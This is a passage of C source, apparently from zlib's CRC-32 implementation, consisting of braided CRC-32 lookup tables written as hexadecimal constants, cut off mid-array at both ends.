0x3da66446, 0xf6fab7e3, 0x047a07ad, 0xcf26d408, 0x49b2a6a6, 0x82ee7503, 0x9feb45bb, 0x54b7961e, 0xd223e4b0, 0x197f3715, 0xe82985c0, 0x23755665, 0xa5e124cb, 0x6ebdf76e, 0x73b8c7d6, 0xb8e41473, 0x3e7066dd, 0xf52cb578, 0x0f580a6c, 0xc404d9c9, 0x4290ab67, 0x89cc78c2, 0x94c9487a, 0x5f959bdf, 0xd901e971, 0x125d3ad4, 0xe30b8801, 0x28575ba4, 0xaec3290a, 0x659ffaaf, 0x789aca17, 0xb3c619b2, 0x35526b1c, 0xfe0eb8b9, 0x0c8e08f7, 0xc7d2db52, 0x4146a9fc, 0x8a1a7a59, 0x971f4ae1, 0x5c439944, 0xdad7ebea, 0x118b384f, 0xe0dd8a9a, 0x2b81593f, 0xad152b91, 0x6649f834, 0x7b4cc88c, 0xb0101b29, 0x36846987, 0xfdd8ba22, 0x08f40f5a, 0xc3a8dcff, 0x453cae51, 0x8e607df4, 0x93654d4c, 0x58399ee9, 0xdeadec47, 0x15f13fe2, 0xe4a78d37, 0x2ffb5e92, 0xa96f2c3c, 0x6233ff99, 0x7f36cf21, 0xb46a1c84, 0x32fe6e2a, 0xf9a2bd8f, 0x0b220dc1, 0xc07ede64, 0x46eaacca, 0x8db67f6f, 0x90b34fd7, 0x5bef9c72, 0xdd7beedc, 0x16273d79, 0xe7718fac, 0x2c2d5c09, 0xaab92ea7, 0x61e5fd02, 0x7ce0cdba, 0xb7bc1e1f, 0x31286cb1, 0xfa74bf14, 0x1eb014d8, 0xd5ecc77d, 0x5378b5d3, 0x98246676, 0x852156ce, 0x4e7d856b, 0xc8e9f7c5, 0x03b52460, 0xf2e396b5, 0x39bf4510, 0xbf2b37be, 0x7477e41b, 0x6972d4a3, 0xa22e0706, 0x24ba75a8, 0xefe6a60d, 0x1d661643, 0xd63ac5e6, 0x50aeb748, 0x9bf264ed, 0x86f75455, 0x4dab87f0, 0xcb3ff55e, 0x006326fb, 0xf135942e, 0x3a69478b, 0xbcfd3525, 0x77a1e680, 0x6aa4d638, 0xa1f8059d, 0x276c7733, 0xec30a496, 0x191c11ee, 0xd240c24b, 0x54d4b0e5, 0x9f886340, 0x828d53f8, 0x49d1805d, 0xcf45f2f3, 0x04192156, 0xf54f9383, 0x3e134026, 0xb8873288, 0x73dbe12d, 0x6eded195, 0xa5820230, 0x2316709e, 0xe84aa33b, 0x1aca1375, 0xd196c0d0, 0x5702b27e, 0x9c5e61db, 0x815b5163, 0x4a0782c6, 0xcc93f068, 0x07cf23cd, 0xf6999118, 0x3dc542bd, 0xbb513013, 0x700de3b6, 0x6d08d30e, 0xa65400ab, 0x20c07205, 0xeb9ca1a0, 0x11e81eb4, 0xdab4cd11, 0x5c20bfbf, 0x977c6c1a, 0x8a795ca2, 0x41258f07, 0xc7b1fda9, 0x0ced2e0c, 0xfdbb9cd9, 0x36e74f7c, 0xb0733dd2, 0x7b2fee77, 0x662adecf, 0xad760d6a, 0x2be27fc4, 0xe0beac61, 0x123e1c2f, 0xd962cf8a, 0x5ff6bd24, 0x94aa6e81, 0x89af5e39, 0x42f38d9c, 0xc467ff32, 0x0f3b2c97, 0xfe6d9e42, 0x35314de7, 0xb3a53f49, 0x78f9ecec, 0x65fcdc54, 0xaea00ff1, 0x28347d5f, 0xe368aefa, 0x16441b82, 0xdd18c827, 0x5b8cba89, 0x90d0692c, 0x8dd55994, 0x46898a31, 0xc01df89f, 0x0b412b3a, 0xfa1799ef, 0x314b4a4a, 0xb7df38e4, 0x7c83eb41, 0x6186dbf9, 0xaada085c, 0x2c4e7af2, 0xe712a957, 0x15921919, 0xdececabc, 0x585ab812, 0x93066bb7, 0x8e035b0f, 0x455f88aa, 0xc3cbfa04, 0x089729a1, 0xf9c19b74, 0x329d48d1, 0xb4093a7f, 0x7f55e9da, 0x6250d962, 0xa90c0ac7, 0x2f987869, 0xe4c4abcc}, {0x00000000, 0x3d6029b0, 0x7ac05360, 0x47a07ad0, 0xf580a6c0, 0xc8e08f70, 0x8f40f5a0, 0xb220dc10, 0x30704bc1, 0x0d106271, 0x4ab018a1, 0x77d03111, 0xc5f0ed01, 0xf890c4b1, 0xbf30be61, 0x825097d1, 0x60e09782, 0x5d80be32, 0x1a20c4e2, 0x2740ed52, 0x95603142, 0xa80018f2, 0xefa06222, 0xd2c04b92, 0x5090dc43, 0x6df0f5f3, 0x2a508f23, 0x1730a693, 0xa5107a83, 0x98705333, 0xdfd029e3, 0xe2b00053, 0xc1c12f04, 0xfca106b4, 0xbb017c64, 0x866155d4, 0x344189c4, 0x0921a074, 0x4e81daa4, 0x73e1f314, 0xf1b164c5, 0xccd14d75, 0x8b7137a5, 0xb6111e15, 0x0431c205, 0x3951ebb5, 0x7ef19165, 0x4391b8d5, 0xa121b886, 0x9c419136, 0xdbe1ebe6, 0xe681c256, 0x54a11e46, 0x69c137f6, 0x2e614d26, 0x13016496, 0x9151f347, 0xac31daf7, 0xeb91a027, 0xd6f18997, 0x64d15587, 0x59b17c37, 0x1e1106e7, 0x23712f57, 0x58f35849, 0x659371f9, 0x22330b29, 0x1f532299, 0xad73fe89, 0x9013d739, 0xd7b3ade9, 0xead38459, 0x68831388, 0x55e33a38, 0x124340e8, 0x2f236958, 0x9d03b548, 0xa0639cf8, 0xe7c3e628, 0xdaa3cf98, 0x3813cfcb, 0x0573e67b, 0x42d39cab, 0x7fb3b51b, 0xcd93690b, 0xf0f340bb, 0xb7533a6b, 0x8a3313db, 0x0863840a, 0x3503adba, 0x72a3d76a, 0x4fc3feda, 0xfde322ca, 0xc0830b7a, 0x872371aa, 0xba43581a, 0x9932774d, 0xa4525efd, 0xe3f2242d, 0xde920d9d, 0x6cb2d18d, 0x51d2f83d, 0x167282ed, 0x2b12ab5d, 0xa9423c8c, 0x9422153c, 0xd3826fec, 0xeee2465c, 0x5cc29a4c, 0x61a2b3fc, 0x2602c92c, 0x1b62e09c, 0xf9d2e0cf, 0xc4b2c97f, 0x8312b3af, 0xbe729a1f, 0x0c52460f, 0x31326fbf, 0x7692156f, 0x4bf23cdf, 0xc9a2ab0e, 0xf4c282be, 0xb362f86e, 0x8e02d1de, 0x3c220dce, 0x0142247e, 0x46e25eae, 0x7b82771e, 0xb1e6b092, 0x8c869922, 0xcb26e3f2, 0xf646ca42, 0x44661652, 0x79063fe2, 0x3ea64532, 0x03c66c82, 0x8196fb53, 0xbcf6d2e3, 0xfb56a833, 0xc6368183, 0x74165d93, 0x49767423, 0x0ed60ef3, 0x33b62743, 0xd1062710, 0xec660ea0, 0xabc67470, 0x96a65dc0, 0x248681d0, 0x19e6a860, 0x5e46d2b0, 0x6326fb00, 0xe1766cd1, 0xdc164561, 0x9bb63fb1, 0xa6d61601, 0x14f6ca11, 0x2996e3a1, 0x6e369971, 0x5356b0c1, 0x70279f96, 0x4d47b626, 0x0ae7ccf6, 0x3787e546, 0x85a73956, 0xb8c710e6, 0xff676a36, 0xc2074386, 0x4057d457, 0x7d37fde7, 0x3a978737, 0x07f7ae87, 0xb5d77297, 0x88b75b27, 0xcf1721f7, 0xf2770847, 0x10c70814, 0x2da721a4, 0x6a075b74, 0x576772c4, 0xe547aed4, 0xd8278764, 0x9f87fdb4, 0xa2e7d404, 0x20b743d5, 0x1dd76a65, 0x5a7710b5, 0x67173905, 0xd537e515, 0xe857cca5, 0xaff7b675, 0x92979fc5, 0xe915e8db, 0xd475c16b, 0x93d5bbbb, 0xaeb5920b, 0x1c954e1b, 0x21f567ab, 0x66551d7b, 0x5b3534cb, 0xd965a31a, 0xe4058aaa, 0xa3a5f07a, 0x9ec5d9ca, 0x2ce505da, 0x11852c6a, 0x562556ba, 0x6b457f0a, 0x89f57f59, 0xb49556e9, 0xf3352c39, 0xce550589, 0x7c75d999, 0x4115f029, 0x06b58af9, 0x3bd5a349, 0xb9853498, 0x84e51d28, 0xc34567f8, 0xfe254e48, 0x4c059258, 0x7165bbe8, 0x36c5c138, 0x0ba5e888, 0x28d4c7df, 0x15b4ee6f, 0x521494bf, 0x6f74bd0f, 0xdd54611f, 0xe03448af, 0xa794327f, 0x9af41bcf, 0x18a48c1e, 0x25c4a5ae, 0x6264df7e, 0x5f04f6ce, 0xed242ade, 0xd044036e, 0x97e479be, 0xaa84500e, 0x4834505d, 0x755479ed, 0x32f4033d, 0x0f942a8d, 0xbdb4f69d, 0x80d4df2d, 0xc774a5fd, 0xfa148c4d, 0x78441b9c, 0x4524322c, 0x028448fc, 0x3fe4614c, 0x8dc4bd5c, 0xb0a494ec, 0xf704ee3c, 0xca64c78c}, {0x00000000, 0xb8bc6765, 0xaa09c88b, 0x12b5afee, 0x8f629757, 0x37def032, 0x256b5fdc, 0x9dd738b9, 0xc5b428ef, 0x7d084f8a, 0x6fbde064, 0xd7018701, 0x4ad6bfb8, 0xf26ad8dd, 0xe0df7733, 0x58631056, 0x5019579f, 0xe8a530fa, 0xfa109f14, 0x42acf871, 0xdf7bc0c8, 0x67c7a7ad, 0x75720843, 0xcdce6f26, 0x95ad7f70, 0x2d111815, 0x3fa4b7fb, 0x8718d09e, 0x1acfe827, 0xa2738f42, 0xb0c620ac, 0x087a47c9, 0xa032af3e, 0x188ec85b, 0x0a3b67b5, 0xb28700d0, 0x2f503869, 0x97ec5f0c, 0x8559f0e2, 0x3de59787, 0x658687d1, 0xdd3ae0b4, 0xcf8f4f5a, 0x7733283f, 0xeae41086, 0x525877e3, 0x40edd80d, 0xf851bf68, 0xf02bf8a1, 0x48979fc4, 0x5a22302a, 0xe29e574f, 0x7f496ff6, 0xc7f50893, 0xd540a77d, 0x6dfcc018, 0x359fd04e, 0x8d23b72b, 0x9f9618c5, 0x272a7fa0, 0xbafd4719, 0x0241207c, 0x10f48f92, 0xa848e8f7, 0x9b14583d, 0x23a83f58, 0x311d90b6, 0x89a1f7d3, 0x1476cf6a, 0xaccaa80f, 0xbe7f07e1, 0x06c36084, 0x5ea070d2, 0xe61c17b7, 0xf4a9b859, 0x4c15df3c, 0xd1c2e785, 0x697e80e0, 0x7bcb2f0e, 0xc377486b, 0xcb0d0fa2, 0x73b168c7, 0x6104c729, 0xd9b8a04c, 0x446f98f5, 0xfcd3ff90, 0xee66507e, 0x56da371b, 0x0eb9274d, 0xb6054028, 0xa4b0efc6, 0x1c0c88a3, 0x81dbb01a, 0x3967d77f, 0x2bd27891, 0x936e1ff4, 0x3b26f703, 0x839a9066, 0x912f3f88, 0x299358ed, 0xb4446054, 0x0cf80731, 0x1e4da8df, 0xa6f1cfba, 0xfe92dfec, 0x462eb889, 0x549b1767, 0xec277002, 0x71f048bb, 0xc94c2fde, 0xdbf98030, 0x6345e755, 0x6b3fa09c, 0xd383c7f9, 0xc1366817, 0x798a0f72, 0xe45d37cb, 0x5ce150ae, 0x4e54ff40, 0xf6e89825, 0xae8b8873, 0x1637ef16, 0x048240f8, 0xbc3e279d, 0x21e91f24, 0x99557841, 0x8be0d7af, 0x335cb0ca, 0xed59b63b, 0x55e5d15e, 0x47507eb0, 0xffec19d5, 0x623b216c, 0xda874609, 0xc832e9e7, 0x708e8e82, 0x28ed9ed4, 0x9051f9b1, 0x82e4565f, 0x3a58313a, 0xa78f0983, 0x1f336ee6, 0x0d86c108, 0xb53aa66d, 0xbd40e1a4, 0x05fc86c1, 0x1749292f, 0xaff54e4a, 0x322276f3, 0x8a9e1196, 0x982bbe78, 0x2097d91d, 0x78f4c94b, 0xc048ae2e, 0xd2fd01c0, 0x6a4166a5, 0xf7965e1c, 0x4f2a3979, 0x5d9f9697, 0xe523f1f2, 0x4d6b1905, 0xf5d77e60, 0xe762d18e, 0x5fdeb6eb, 0xc2098e52, 0x7ab5e937, 0x680046d9, 0xd0bc21bc, 0x88df31ea, 0x3063568f, 0x22d6f961, 0x9a6a9e04, 0x07bda6bd, 0xbf01c1d8, 0xadb46e36, 0x15080953, 0x1d724e9a, 0xa5ce29ff, 0xb77b8611, 0x0fc7e174, 0x9210d9cd, 0x2aacbea8, 0x38191146, 0x80a57623, 0xd8c66675, 0x607a0110, 0x72cfaefe, 0xca73c99b, 0x57a4f122, 0xef189647, 0xfdad39a9, 0x45115ecc, 0x764dee06, 0xcef18963, 0xdc44268d, 0x64f841e8, 0xf92f7951, 0x41931e34, 0x5326b1da, 0xeb9ad6bf, 0xb3f9c6e9, 0x0b45a18c, 0x19f00e62, 0xa14c6907, 0x3c9b51be, 0x842736db, 0x96929935, 0x2e2efe50, 0x2654b999, 0x9ee8defc, 0x8c5d7112, 0x34e11677, 0xa9362ece, 0x118a49ab, 0x033fe645, 0xbb838120, 0xe3e09176, 0x5b5cf613, 0x49e959fd, 0xf1553e98, 0x6c820621, 0xd43e6144, 0xc68bceaa, 0x7e37a9cf, 0xd67f4138, 0x6ec3265d, 0x7c7689b3, 0xc4caeed6, 0x591dd66f, 0xe1a1b10a, 0xf3141ee4, 0x4ba87981, 0x13cb69d7, 0xab770eb2, 0xb9c2a15c, 0x017ec639, 0x9ca9fe80, 0x241599e5, 0x36a0360b, 0x8e1c516e, 0x866616a7, 0x3eda71c2, 0x2c6fde2c, 0x94d3b949, 0x090481f0, 0xb1b8e695, 0xa30d497b, 0x1bb12e1e, 0x43d23e48, 0xfb6e592d, 0xe9dbf6c3, 0x516791a6, 0xccb0a91f, 0x740cce7a, 0x66b96194, 0xde0506f1}, {0x00000000, 0x01c26a37, 0x0384d46e, 0x0246be59, 0x0709a8dc, 0x06cbc2eb, 0x048d7cb2, 0x054f1685, 0x0e1351b8, 0x0fd13b8f, 0x0d9785d6, 0x0c55efe1, 0x091af964, 0x08d89353, 0x0a9e2d0a, 0x0b5c473d, 0x1c26a370, 0x1de4c947, 0x1fa2771e, 0x1e601d29, 0x1b2f0bac, 0x1aed619b, 0x18abdfc2, 0x1969b5f5, 0x1235f2c8, 0x13f798ff, 0x11b126a6, 0x10734c91, 0x153c5a14, 0x14fe3023, 0x16b88e7a, 0x177ae44d, 0x384d46e0, 0x398f2cd7, 0x3bc9928e, 0x3a0bf8b9, 0x3f44ee3c, 0x3e86840b, 0x3cc03a52, 0x3d025065, 0x365e1758, 0x379c7d6f, 0x35dac336, 0x3418a901, 0x3157bf84, 0x3095d5b3, 0x32d36bea, 0x331101dd, 0x246be590, 0x25a98fa7, 0x27ef31fe, 0x262d5bc9, 0x23624d4c, 0x22a0277b, 0x20e69922, 0x2124f315, 0x2a78b428, 0x2bbade1f, 0x29fc6046, 0x283e0a71, 0x2d711cf4, 0x2cb376c3, 0x2ef5c89a, 0x2f37a2ad, 0x709a8dc0, 0x7158e7f7, 0x731e59ae, 0x72dc3399, 0x7793251c, 0x76514f2b, 0x7417f172, 0x75d59b45, 0x7e89dc78, 0x7f4bb64f, 0x7d0d0816, 0x7ccf6221, 0x798074a4, 0x78421e93, 0x7a04a0ca, 0x7bc6cafd, 0x6cbc2eb0, 0x6d7e4487, 0x6f38fade, 0x6efa90e9, 0x6bb5866c, 0x6a77ec5b, 0x68315202, 0x69f33835, 0x62af7f08, 0x636d153f, 0x612bab66, 0x60e9c151, 0x65a6d7d4, 0x6464bde3, 0x662203ba, 0x67e0698d, 0x48d7cb20, 0x4915a117, 0x4b531f4e, 0x4a917579, 0x4fde63fc, 0x4e1c09cb, 0x4c5ab792, 0x4d98dda5, 0x46c49a98, 0x4706f0af, 0x45404ef6, 0x448224c1, 0x41cd3244, 0x400f5873, 0x4249e62a, 0x438b8c1d, 0x54f16850, 0x55330267, 0x5775bc3e, 0x56b7d609, 0x53f8c08c, 0x523aaabb, 0x507c14e2, 0x51be7ed5, 0x5ae239e8, 0x5b2053df, 0x5966ed86, 0x58a487b1, 0x5deb9134, 0x5c29fb03, 0x5e6f455a, 0x5fad2f6d, 0xe1351b80, 0xe0f771b7, 0xe2b1cfee, 0xe373a5d9, 0xe63cb35c, 0xe7fed96b, 0xe5b86732, 0xe47a0d05, 0xef264a38, 0xeee4200f, 0xeca29e56, 0xed60f461, 0xe82fe2e4, 0xe9ed88d3, 0xebab368a, 0xea695cbd, 0xfd13b8f0, 0xfcd1d2c7, 0xfe976c9e, 0xff5506a9, 0xfa1a102c, 0xfbd87a1b, 0xf99ec442, 0xf85cae75, 0xf300e948, 0xf2c2837f, 0xf0843d26, 0xf1465711, 0xf4094194, 0xf5cb2ba3, 0xf78d95fa, 0xf64fffcd, 0xd9785d60, 0xd8ba3757, 0xdafc890e, 0xdb3ee339, 0xde71f5bc, 0xdfb39f8b, 0xddf521d2, 0xdc374be5, 0xd76b0cd8, 0xd6a966ef, 0xd4efd8b6, 0xd52db281, 0xd062a404, 0xd1a0ce33, 0xd3e6706a, 0xd2241a5d, 0xc55efe10, 0xc49c9427, 0xc6da2a7e, 0xc7184049, 0xc25756cc, 0xc3953cfb, 0xc1d382a2, 0xc011e895, 0xcb4dafa8, 0xca8fc59f, 0xc8c97bc6, 0xc90b11f1, 0xcc440774, 0xcd866d43, 0xcfc0d31a, 0xce02b92d, 0x91af9640, 0x906dfc77, 0x922b422e, 0x93e92819, 0x96a63e9c, 0x976454ab, 0x9522eaf2, 0x94e080c5, 0x9fbcc7f8, 0x9e7eadcf, 0x9c381396, 0x9dfa79a1, 0x98b56f24, 0x99770513, 0x9b31bb4a, 0x9af3d17d, 0x8d893530, 0x8c4b5f07, 0x8e0de15e, 0x8fcf8b69, 0x8a809dec, 0x8b42f7db, 0x89044982, 0x88c623b5, 0x839a6488, 0x82580ebf, 0x801eb0e6, 0x81dcdad1, 0x8493cc54, 0x8551a663, 0x8717183a, 0x86d5720d, 0xa9e2d0a0, 0xa820ba97, 0xaa6604ce, 0xaba46ef9, 0xaeeb787c, 0xaf29124b, 0xad6fac12, 0xacadc625, 0xa7f18118, 0xa633eb2f, 0xa4755576, 0xa5b73f41, 0xa0f829c4, 0xa13a43f3, 0xa37cfdaa, 0xa2be979d, 0xb5c473d0, 0xb40619e7, 0xb640a7be, 0xb782cd89, 0xb2cddb0c, 0xb30fb13b, 0xb1490f62, 0xb08b6555, 0xbbd72268, 0xba15485f, 0xb853f606, 0xb9919c31, 0xbcde8ab4, 0xbd1ce083, 0xbf5a5eda, 0xbe9834ed}, {0x00000000, 0x191b3141, 0x32366282, 0x2b2d53c3, 0x646cc504, 0x7d77f445, 0x565aa786, 0x4f4196c7, 0xc8d98a08, 0xd1c2bb49, 0xfaefe88a, 0xe3f4d9cb, 0xacb54f0c, 0xb5ae7e4d, 0x9e832d8e, 0x87981ccf, 0x4ac21251, 0x53d92310, 0x78f470d3, 0x61ef4192, 0x2eaed755, 0x37b5e614, 0x1c98b5d7, 0x05838496, 0x821b9859, 0x9b00a918, 0xb02dfadb, 0xa936cb9a, 0xe6775d5d, 0xff6c6c1c, 0xd4413fdf, 0xcd5a0e9e, 0x958424a2, 0x8c9f15e3, 0xa7b24620, 0xbea97761, 0xf1e8e1a6, 0xe8f3d0e7, 0xc3de8324, 0xdac5b265, 0x5d5daeaa, 0x44469feb, 0x6f6bcc28, 0x7670fd69, 0x39316bae, 0x202a5aef, 0x0b07092c, 0x121c386d, 0xdf4636f3, 0xc65d07b2, 0xed705471, 0xf46b6530, 0xbb2af3f7, 0xa231c2b6, 0x891c9175, 0x9007a034, 0x179fbcfb, 0x0e848dba, 0x25a9de79, 0x3cb2ef38, 0x73f379ff, 0x6ae848be, 0x41c51b7d, 0x58de2a3c, 0xf0794f05, 0xe9627e44, 0xc24f2d87, 0xdb541cc6, 0x94158a01, 0x8d0ebb40, 0xa623e883, 0xbf38d9c2, 0x38a0c50d, 0x21bbf44c, 0x0a96a78f, 0x138d96ce, 0x5ccc0009, 0x45d73148, 0x6efa628b, 0x77e153ca, 0xbabb5d54, 0xa3a06c15, 0x888d3fd6, 0x91960e97, 0xded79850, 0xc7cca911, 0xece1fad2, 0xf5facb93, 0x7262d75c, 0x6b79e61d, 0x4054b5de, 0x594f849f, 0x160e1258, 0x0f152319, 0x243870da, 0x3d23419b, 0x65fd6ba7, 0x7ce65ae6, 0x57cb0925, 0x4ed03864, 0x0191aea3, 0x188a9fe2, 0x33a7cc21, 0x2abcfd60, 0xad24e1af, 0xb43fd0ee, 0x9f12832d, 0x8609b26c, 0xc94824ab, 0xd05315ea, 0xfb7e4629, 0xe2657768, 0x2f3f79f6, 0x362448b7, 0x1d091b74, 0x04122a35, 0x4b53bcf2, 0x52488db3, 0x7965de70, 0x607eef31, 0xe7e6f3fe, 0xfefdc2bf, 0xd5d0917c, 0xcccba03d, 0x838a36fa, 0x9a9107bb, 0xb1bc5478, 0xa8a76539, 0x3b83984b, 0x2298a90a, 0x09b5fac9, 0x10aecb88, 0x5fef5d4f, 0x46f46c0e, 0x6dd93fcd, 0x74c20e8c, 0xf35a1243, 0xea412302, 0xc16c70c1, 0xd8774180, 0x9736d747, 0x8e2de606, 0xa500b5c5, 0xbc1b8484, 0x71418a1a, 0x685abb5b, 0x4377e898, 0x5a6cd9d9, 0x152d4f1e, 0x0c367e5f, 0x271b2d9c, 0x3e001cdd, 0xb9980012, 0xa0833153, 0x8bae6290, 0x92b553d1, 0xddf4c516, 0xc4eff457, 0xefc2a794, 0xf6d996d5, 0xae07bce9, 0xb71c8da8, 0x9c31de6b, 0x852aef2a, 0xca6b79ed, 0xd37048ac, 0xf85d1b6f, 0xe1462a2e, 0x66de36e1, 0x7fc507a0, 0x54e85463, 0x4df36522, 0x02b2f3e5, 0x1ba9c2a4, 0x30849167, 0x299fa026, 0xe4c5aeb8, 0xfdde9ff9, 0xd6f3cc3a, 0xcfe8fd7b, 0x80a96bbc, 0x99b25afd, 0xb29f093e, 0xab84387f, 0x2c1c24b0, 0x350715f1, 0x1e2a4632, 0x07317773, 0x4870e1b4, 0x516bd0f5, 0x7a468336, 0x635db277, 0xcbfad74e, 0xd2e1e60f, 0xf9ccb5cc, 0xe0d7848d, 0xaf96124a, 0xb68d230b, 0x9da070c8, 0x84bb4189, 0x03235d46, 0x1a386c07, 0x31153fc4, 0x280e0e85, 0x674f9842, 0x7e54a903, 0x5579fac0, 0x4c62cb81, 0x8138c51f, 0x9823f45e, 0xb30ea79d, 0xaa1596dc, 0xe554001b, 0xfc4f315a, 0xd7626299, 0xce7953d8, 0x49e14f17, 0x50fa7e56, 0x7bd72d95, 0x62cc1cd4, 0x2d8d8a13, 0x3496bb52, 0x1fbbe891, 0x06a0d9d0, 0x5e7ef3ec, 0x4765c2ad, 0x6c48916e, 0x7553a02f, 0x3a1236e8, 0x230907a9, 0x0824546a, 0x113f652b, 0x96a779e4, 0x8fbc48a5, 0xa4911b66, 0xbd8a2a27, 0xf2cbbce0, 0xebd08da1, 0xc0fdde62, 0xd9e6ef23, 0x14bce1bd, 0x0da7d0fc, 0x268a833f, 0x3f91b27e, 0x70d024b9, 0x69cb15f8, 0x42e6463b, 0x5bfd777a, 0xdc656bb5, 0xc57e5af4, 0xee530937, 0xf7483876, 0xb809aeb1, 0xa1129ff0, 0x8a3fcc33, 0x9324fd72}, {0x00000000, 0x77073096, 0xee0e612c, 0x990951ba, 0x076dc419, 0x706af48f, 0xe963a535, 0x9e6495a3, 0x0edb8832, 0x79dcb8a4, 0xe0d5e91e, 0x97d2d988, 0x09b64c2b, 0x7eb17cbd, 0xe7b82d07, 0x90bf1d91, 0x1db71064, 0x6ab020f2, 0xf3b97148, 0x84be41de, 0x1adad47d, 0x6ddde4eb, 0xf4d4b551, 0x83d385c7, 0x136c9856, 0x646ba8c0, 0xfd62f97a, 0x8a65c9ec, 0x14015c4f, 0x63066cd9, 0xfa0f3d63, 0x8d080df5, 0x3b6e20c8, 0x4c69105e, 0xd56041e4, 0xa2677172, 0x3c03e4d1, 0x4b04d447, 0xd20d85fd, 0xa50ab56b, 0x35b5a8fa, 0x42b2986c, 0xdbbbc9d6, 0xacbcf940, 0x32d86ce3, 0x45df5c75, 0xdcd60dcf, 0xabd13d59, 0x26d930ac, 0x51de003a, 0xc8d75180, 0xbfd06116, 0x21b4f4b5, 0x56b3c423, 0xcfba9599, 0xb8bda50f, 0x2802b89e, 0x5f058808, 0xc60cd9b2, 0xb10be924, 0x2f6f7c87, 0x58684c11, 0xc1611dab, 0xb6662d3d, 0x76dc4190, 0x01db7106, 0x98d220bc, 0xefd5102a, 0x71b18589, 0x06b6b51f, 0x9fbfe4a5, 0xe8b8d433, 0x7807c9a2, 0x0f00f934, 0x9609a88e, 0xe10e9818, 0x7f6a0dbb, 0x086d3d2d, 0x91646c97, 0xe6635c01, 0x6b6b51f4, 0x1c6c6162, 0x856530d8, 0xf262004e, 0x6c0695ed, 0x1b01a57b, 0x8208f4c1, 0xf50fc457, 0x65b0d9c6, 0x12b7e950, 0x8bbeb8ea, 0xfcb9887c, 0x62dd1ddf, 0x15da2d49, 0x8cd37cf3, 0xfbd44c65, 0x4db26158, 0x3ab551ce, 0xa3bc0074, 0xd4bb30e2, 0x4adfa541, 0x3dd895d7, 0xa4d1c46d, 0xd3d6f4fb, 0x4369e96a, 0x346ed9fc, 0xad678846, 0xda60b8d0, 0x44042d73, 0x33031de5, 0xaa0a4c5f, 0xdd0d7cc9, 0x5005713c, 0x270241aa, 0xbe0b1010, 0xc90c2086, 0x5768b525, 0x206f85b3, 0xb966d409, 0xce61e49f, 0x5edef90e, 0x29d9c998, 0xb0d09822, 0xc7d7a8b4, 0x59b33d17, 0x2eb40d81, 0xb7bd5c3b, 0xc0ba6cad, 0xedb88320, 0x9abfb3b6, 0x03b6e20c, 0x74b1d29a, 0xead54739, 0x9dd277af, 0x04db2615, 0x73dc1683, 0xe3630b12, 0x94643b84, 0x0d6d6a3e, 0x7a6a5aa8, 0xe40ecf0b, 0x9309ff9d, 0x0a00ae27, 0x7d079eb1, 0xf00f9344, 0x8708a3d2, 0x1e01f268, 0x6906c2fe, 0xf762575d, 0x806567cb, 0x196c3671, 0x6e6b06e7, 0xfed41b76, 0x89d32be0, 0x10da7a5a, 0x67dd4acc, 0xf9b9df6f, 0x8ebeeff9, 0x17b7be43, 0x60b08ed5, 0xd6d6a3e8, 0xa1d1937e, 0x38d8c2c4, 0x4fdff252, 0xd1bb67f1, 0xa6bc5767, 0x3fb506dd, 0x48b2364b, 0xd80d2bda, 0xaf0a1b4c, 0x36034af6, 0x41047a60, 0xdf60efc3, 0xa867df55, 0x316e8eef, 0x4669be79, 0xcb61b38c, 0xbc66831a, 0x256fd2a0, 0x5268e236, 0xcc0c7795, 0xbb0b4703, 0x220216b9, 0x5505262f, 0xc5ba3bbe, 0xb2bd0b28, 0x2bb45a92, 0x5cb36a04, 0xc2d7ffa7, 0xb5d0cf31, 0x2cd99e8b, 0x5bdeae1d, 0x9b64c2b0, 0xec63f226, 0x756aa39c, 0x026d930a, 0x9c0906a9, 0xeb0e363f, 0x72076785, 0x05005713, 0x95bf4a82, 0xe2b87a14, 0x7bb12bae, 0x0cb61b38, 0x92d28e9b, 0xe5d5be0d, 0x7cdcefb7, 0x0bdbdf21, 0x86d3d2d4, 0xf1d4e242, 0x68ddb3f8, 0x1fda836e, 0x81be16cd, 0xf6b9265b, 0x6fb077e1, 0x18b74777, 0x88085ae6, 0xff0f6a70, 0x66063bca, 0x11010b5c, 0x8f659eff, 0xf862ae69, 0x616bffd3, 0x166ccf45, 0xa00ae278, 0xd70dd2ee, 0x4e048354, 0x3903b3c2, 0xa7672661, 0xd06016f7, 0x4969474d, 0x3e6e77db, 0xaed16a4a, 0xd9d65adc, 0x40df0b66, 0x37d83bf0, 0xa9bcae53, 0xdebb9ec5, 0x47b2cf7f, 0x30b5ffe9, 0xbdbdf21c, 0xcabac28a, 0x53b39330, 0x24b4a3a6, 0xbad03605, 0xcdd70693, 0x54de5729, 0x23d967bf, 0xb3667a2e, 0xc4614ab8, 0x5d681b02, 0x2a6f2b94, 0xb40bbe37, 0xc30c8ea1, 0x5a05df1b, 0x2d02ef8d}}; local const z_word_t FAR crc_braid_big_table[][256] = { {0x0000000000000000, 0x9630077700000000, 0x2c610eee00000000, 0xba51099900000000, 0x19c46d0700000000, 0x8ff46a7000000000, 0x35a563e900000000, 0xa395649e00000000, 0x3288db0e00000000, 0xa4b8dc7900000000, 0x1ee9d5e000000000, 0x88d9d29700000000, 0x2b4cb60900000000, 0xbd7cb17e00000000, 0x072db8e700000000, 0x911dbf9000000000, 0x6410b71d00000000, 0xf220b06a00000000, 0x4871b9f300000000, 0xde41be8400000000, 0x7dd4da1a00000000, 0xebe4dd6d00000000, 0x51b5d4f400000000, 0xc785d38300000000, 0x56986c1300000000, 0xc0a86b6400000000, 0x7af962fd00000000, 0xecc9658a00000000, 0x4f5c011400000000, 0xd96c066300000000, 0x633d0ffa00000000, 0xf50d088d00000000, 0xc8206e3b00000000, 0x5e10694c00000000, 0xe44160d500000000, 0x727167a200000000, 0xd1e4033c00000000, 0x47d4044b00000000, 0xfd850dd200000000, 0x6bb50aa500000000, 0xfaa8b53500000000, 0x6c98b24200000000, 0xd6c9bbdb00000000, 0x40f9bcac00000000, 0xe36cd83200000000, 0x755cdf4500000000, 0xcf0dd6dc00000000, 0x593dd1ab00000000, 0xac30d92600000000, 0x3a00de5100000000, 0x8051d7c800000000, 0x1661d0bf00000000, 0xb5f4b42100000000, 0x23c4b35600000000, 0x9995bacf00000000, 0x0fa5bdb800000000, 0x9eb8022800000000, 0x0888055f00000000, 0xb2d90cc600000000, 0x24e90bb100000000, 0x877c6f2f00000000, 0x114c685800000000, 0xab1d61c100000000, 0x3d2d66b600000000, 0x9041dc7600000000, 0x0671db0100000000, 0xbc20d29800000000, 0x2a10d5ef00000000, 0x8985b17100000000, 0x1fb5b60600000000, 0xa5e4bf9f00000000, 0x33d4b8e800000000, 0xa2c9077800000000, 0x34f9000f00000000, 0x8ea8099600000000, 0x18980ee100000000, 0xbb0d6a7f00000000, 